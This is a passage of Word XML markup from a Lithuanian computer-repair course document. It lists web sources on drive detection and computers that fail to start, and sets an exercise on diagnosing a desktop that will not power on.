      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> L. </w:t>
      </w:r>
      <w:r w:rsidR="710847D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2021, sausio 10)</w:t>
      </w:r>
      <w:r w:rsidR="5AC5141A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="53CEB6E0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">BIOS Not Detecting SSD in Computer. </w:t>
      </w:r>
      <w:r w:rsidR="4A241CFA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Driver easy.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="4A241CFA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:anchor=":~:text=Solution%202%3A%20Configure%20the%20SSD,is%20not%20recognized%20by%20BIOS.&amp;text=Then%20you'll%20see%20SATA,your%20computer%20to%20enter%20BIOS">
        <w:r w:rsidR="4A241CFA" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.drivereasy.com/knowledge/fixed-bios-not-detecting-ssd-in-computer/#:~:text=Solution%202%3A%20Configure%20the%20SSD,is%20not%20recognized%20by%20BIOS.&amp;text=Then%20you'll%20see%20SATA,your%20computer%20to%20enter%20BIOS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="64B8B005" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104F007" w14:textId="4A0F0994" w:rsidR="3390F1A9" w:rsidRPr="005A5C28" w:rsidRDefault="31AD024E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The BIOS does not detect or recognize the Solid State Drive. </w:t>
      </w:r>
      <w:r w:rsidR="41CFE0A6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Seag</w:t>
      </w:r>
      <w:r w:rsidR="71CF28A3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ate. </w:t>
      </w:r>
      <w:r w:rsidR="54BF0CD9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2021, sausio 10).</w:t>
      </w:r>
      <w:r w:rsidR="4EA85278" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="71CF28A3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId63">
        <w:r w:rsidR="71CF28A3" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-solid-state-drive-005707en/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="578EB0E7" w14:textId="25868BAE" w:rsidR="3390F1A9" w:rsidRPr="005A5C28" w:rsidRDefault="4EA411DD" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The BIOS does not detect or recognise the ATA/SATA hard drive. </w:t>
      </w:r>
      <w:r w:rsidR="2FEAA7EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Seagate</w:t>
      </w:r>
      <w:r w:rsidR="1FE5DAA2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="45268B30" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2021, sausio 10).</w:t>
      </w:r>
      <w:r w:rsidR="4EA85278" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="1FE5DAA2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId64">
        <w:r w:rsidR="1FE5DAA2" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-ata-sata-hard-drive-168595en/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64199437" w14:textId="11EFF647" w:rsidR="278233C7" w:rsidRPr="005A5C28" w:rsidRDefault="28E599B0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Most Common Computer Breakdowns. </w:t>
      </w:r>
      <w:r w:rsidR="27D0402C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2021, sausio 10).</w:t>
      </w:r>
      <w:r w:rsidR="0150B004" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0E30280C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Eclipse ICT.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="0150B004" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="5B3F18BD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://www.eclipseict.co.uk/most-common-computer-breakdowns/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243EEA0F" w14:textId="116BB423" w:rsidR="0B4A386B" w:rsidRPr="005A5C28" w:rsidRDefault="0B4A386B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E562DCB" w14:textId="070795AD" w:rsidR="19EDBAC7" w:rsidRPr="005A5C28" w:rsidRDefault="7A36EB09" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="031EF950" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="328D9925" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="328D9925" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> NUSTATYTI KOMPIUTERINĖS SI</w:t>
      </w:r>
      <w:r w:rsidR="4B643B71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="328D9925" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TEMOS APARATINĮ GEDIMĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579E9F3D" w14:textId="6F7E74C5" w:rsidR="00B8163F" w:rsidRPr="005A5C28" w:rsidRDefault="328D9925" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jums p</w:t>
      </w:r>
      <w:r w:rsidR="00471B82" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateikta</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuterinė sistema (st</w:t>
      </w:r>
      <w:r w:rsidR="276A811B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>acionarus</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuteris ir monitorius). </w:t>
      </w:r>
      <w:r w:rsidR="0086245E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spaudžiant „Į</w:t>
      </w:r>
      <w:r w:rsidR="6EA38204" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jungimo</w:t>
      </w:r>
      <w:r w:rsidR="0086245E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="6EA38204" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> mygtuką</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="68F8862B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kompiuteris</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2781370B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>neįsijungia</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Aprašykite galimus gedimus ir nurodykite</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jų priežastį</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>šv</w:t>
      </w:r>
      <w:r w:rsidR="0061226A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ardinkite </w:t>
      </w:r>
      <w:r w:rsidR="6A418876" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>galim</w:t>
      </w:r>
      <w:r w:rsidR="00FC2F5D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sugedu</w:t>
      </w:r>
      <w:r w:rsidR="6F80A44A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sius</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> komponent</w:t>
      </w:r>
      <w:r w:rsidR="498DBD10" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5416BA29" w14:textId="77777777" w:rsidR="00902AC8" w:rsidRPr="005A5C28" w:rsidRDefault="00902AC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BC6C25" w14:textId="488C9401" w:rsidR="3C276CAE" w:rsidRPr="005A5C28" w:rsidRDefault="73276030" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B183D" w14:textId="3225C25E" w:rsidR="3EDDA24B" w:rsidRPr="005A5C28" w:rsidRDefault="1F763056" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Why Won't My Computer Turn On? </w:t>
      </w:r>
      <w:r w:rsidR="063356F0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Intel.</w:t>
      </w:r>
      <w:r w:rsidR="035381A9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="035381A9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2020, gruodžio 24)</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="063356F0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId65">
        <w:r w:rsidR="063356F0" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.intel.com/content/www/us/en/gaming/resources/why-wont-my-computer-turn-on.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CF75616" w14:textId="708E8981" w:rsidR="3C276CAE" w:rsidRPr="005A5C28" w:rsidRDefault="3642E33F" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Whitson</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> G. (</w:t>
      </w:r>
      <w:r w:rsidR="350B64FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2020, </w:t>
      </w:r>
      <w:r w:rsidR="2C23FF14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gruodžio</w:t>
      </w:r>
      <w:r w:rsidR="3458AA9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5DC13A8A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">24). </w:t>
      </w:r>
      <w:r w:rsidR="16B20EF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">What to Do When Your Computer Won't Start. </w:t>
      </w:r>
      <w:r w:rsidR="1BEDAE06" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PC Magazine</w:t>
      </w:r>
      <w:r w:rsidR="6FFBA489" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="6DBACFAF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId66">
        <w:r w:rsidR="73276030" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.pcmag.com/how-to/what-to-do-when-your-computer-wont-start</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AC30CA5" w14:textId="110B3780" w:rsidR="3C276CAE" w:rsidRPr="005A5C28" w:rsidRDefault="5C93337E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Fisher</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> T. (2020, </w:t>
      </w:r>
      <w:r w:rsidR="2242BE56" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">gruodžio 2). </w:t>
      </w:r>
      <w:r w:rsidR="0FB6294C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Fix a Computer That Won't Turn On. </w:t>
      </w:r>
      <w:r w:rsidR="76483098" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LifeW</w:t>
      </w:r>
      <w:r w:rsidR="7208E45D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ire.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>internetą</w:t>
      </w:r>
      <w:r w:rsidR="6DBACFAF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId67">
        <w:r w:rsidR="73276030" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
